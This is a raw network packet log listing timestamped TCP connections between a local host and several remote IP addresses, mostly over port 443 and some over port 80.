                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.320566893 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.320668936 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.320677996 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.325737000 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.325798988 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.325805902 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.328288078 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.328350067 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.328371048 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.330916882 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.330985069 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.330997944 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.333563089 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.333708048 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.333717108 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.335999966 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.336100101 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.336111069 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.338500023 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.338606119 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.338617086 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.340864897 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.340948105 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.341217995 CET49709443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.341245890 CET44349709142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.754621983 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.754714966 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.754806995 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.755196095 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:20.755230904 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.115453005 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.115534067 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.115735054 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.117810011 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.117850065 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.551426888 CET49721443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.551498890 CET44349721142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.551610947 CET49721443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.551824093 CET49721443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:21.551845074 CET44349721142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.190342903 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.190391064 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.190484047 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.192158937 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.192192078 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.488950968 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.489108086 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.491877079 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.491905928 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.492165089 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.502420902 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.543370008 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.777575016 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.777645111 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.781063080 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.781070948 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.781459093 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.803222895 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.803693056 CET4972880192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.831906080 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.924272060 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.924856901 CET8049728185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.924936056 CET4972880192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.925599098 CET4972880192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.984354019 CET44349721142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.984616995 CET49721443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.984661102 CET44349721142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.985135078 CET44349721142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.985522985 CET49721443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.985616922 CET44349721142.250.185.228192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.986279964 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.986309052 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.986330032 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.986416101 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.986416101 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.986474991 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.987411976 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.031563044 CET49721443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.046742916 CET8049728185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.160682917 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.160712004 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.160804987 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.160804987 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.160850048 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.161031008 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.206394911 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.206423044 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.206485987 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.206507921 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.206545115 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.206577063 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.332710981 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.332741976 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.332948923 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.333005905 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.333333015 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.370040894 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.370071888 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.370130062 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.370146990 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.370193005 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.370217085 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.390244007 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.390264988 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.390352011 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.390368938 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.390501976 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.407289982 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.407310963 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.407356024 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.407370090 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.407403946 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.407445908 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.518966913 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.518991947 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.519109011 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.519109964 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.519136906 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.519337893 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.536825895 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.536849022 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.536983013 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.536999941 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.537120104 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.550538063 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.550559044 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.550709009 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.550724983 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.550837994 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.566026926 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.566046953 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.566154003 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.566169977 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.566564083 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.581758022 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.581779003 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.581949949 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.581965923 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.582494974 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.596311092 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.596330881 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.596574068 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.596590042 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.596668959 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.600847960 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.600943089 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.600956917 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.602502108 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.641655922 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.642426968 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.669424057 CET49730443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.669445992 CET44349730142.250.185.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.669550896 CET49730443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.670567989 CET49730443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.670583010 CET44349730142.250.185.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.672982931 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.673019886 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.673249006 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.673268080 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.962272882 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.962316990 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.963247061 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.993647099 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.993690014 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.993813992 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.994518042 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.994540930 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.994601965 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.001523018 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.001542091 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.001595020 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.006824017 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.006835938 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.007085085 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.007095098 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.008985996 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.008996010 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.009057045 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.009275913 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.009290934 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.016038895 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.020832062 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.020845890 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.022775888 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.022855997 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.022919893 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.023231030 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.023278952 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.054955006 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.095355034 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.186264038 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.231323004 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.488548040 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.488723040 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.488792896 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.488852024 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.488879919 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.488905907 CET49723443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.488924026 CET44349723184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.527729988 CET49738443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.527842045 CET44349738184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.527936935 CET49738443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.528264046 CET49738443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.528301954 CET44349738184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.631835938 CET49739443192.168.2.5142.250.186.46
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.631869078 CET44349739142.250.186.46192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.631939888 CET49739443192.168.2.5142.250.186.46
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.632227898 CET49739443192.168.2.5142.250.186.46
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.632260084 CET44349739142.250.186.46192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735263109 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735291958 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735299110 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735317945 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735341072 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735352039 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735385895 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735418081 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735418081 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.735449076 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.754637957 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.754715919 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.754733086 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.754772902 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.754829884 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.827986956 CET8049728185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.828042030 CET4972880192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.995903015 CET49730443192.168.2.5142.250.185.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.039611101 CET4972880192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.071494102 CET49721443192.168.2.5142.250.185.228
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.071821928 CET49739443192.168.2.5142.250.186.46
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.161427021 CET8049728185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.734837055 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.736937046 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.736967087 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.738878012 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.738883018 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.768455982 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.769287109 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.769320011 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.770467043 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.770474911 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.790597916 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.791414022 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.791414022 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.791430950 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.791439056 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.805960894 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.806466103 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.806488037 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.806682110 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.806689024 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.825278997 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.825932026 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.825993061 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.826276064 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.826293945 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.025661945 CET44349738184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.025782108 CET49738443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.030128002 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.030143976 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.030158043 CET49720443192.168.2.5172.202.163.200
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.030164957 CET44349720172.202.163.200192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.031900883 CET49738443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.031945944 CET44349738184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.032852888 CET44349738184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.037197113 CET49738443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.039952040 CET8049728185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.040096045 CET4972880192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:26.079361916 CET44349738184.28.90.27192.168.2.5
